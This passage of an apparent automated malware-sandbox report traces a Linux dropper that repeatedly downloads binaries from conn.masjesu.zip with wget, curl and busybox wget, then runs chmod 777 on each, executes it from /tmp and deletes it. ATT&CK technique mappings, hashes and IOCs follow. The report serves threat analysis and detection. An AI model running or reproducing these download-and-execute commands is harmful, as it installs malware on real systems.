  - System Network Configuration Discovery
  PID:960
- /bin/chmod
  chmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  ./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
  2⤵
  PID:963
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - System Network Configuration Discovery
  PID:964
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - System Network Configuration Discovery
  PID:967
- /bin/chmod
  chmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - File and Directory Permissions Modification
  PID:968
- /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  ./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  - Executes dropped EXE
  PID:969
- /bin/rm
  rm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
  2⤵
  PID:970
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - System Network Configuration Discovery
  PID:971
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:972
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - System Network Configuration Discovery
  PID:974
- /bin/chmod
  chmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  ./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  - Executes dropped EXE
  PID:976
- /bin/rm
  rm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
  2⤵
  PID:977
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - System Network Configuration Discovery
  PID:978
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - System Network Configuration Discovery
  PID:981
- /bin/chmod
  chmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  ./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
  2⤵
  PID:984
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - System Network Configuration Discovery
  PID:985
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - System Network Configuration Discovery
  PID:988
- /bin/chmod
  chmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - File and Directory Permissions Modification
  PID:989
- /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  ./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  - Executes dropped EXE
  PID:990
- /bin/rm
  rm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
  2⤵
  PID:991
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:992
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:993
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - System Network Configuration Discovery
  PID:995
- /bin/chmod
  chmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - File and Directory Permissions Modification
  PID:996
- /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  ./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  - Executes dropped EXE
  PID:997
- /bin/rm
  rm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
  2⤵
  PID:998
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  PID:999
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1000
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  PID:1002
- /bin/chmod
  chmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - File and Directory Permissions Modification
  PID:1003
- /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - Executes dropped EXE
  PID:1004
- /bin/rm
  rm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
  2⤵
  - System Network Configuration Discovery
  PID:1005

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	737	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	744	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	754	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	787	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	810	UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	820	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	851	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	864	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	871	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	878	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	885	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	892	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	899	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	906	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5	913	Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1	920	0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci	927	Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463	934	V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX	941	zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ	948	BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil	955	2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff	962	PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4	969	OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC	976	LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC	983	pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3	990	6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW	997	UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ	1004	k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ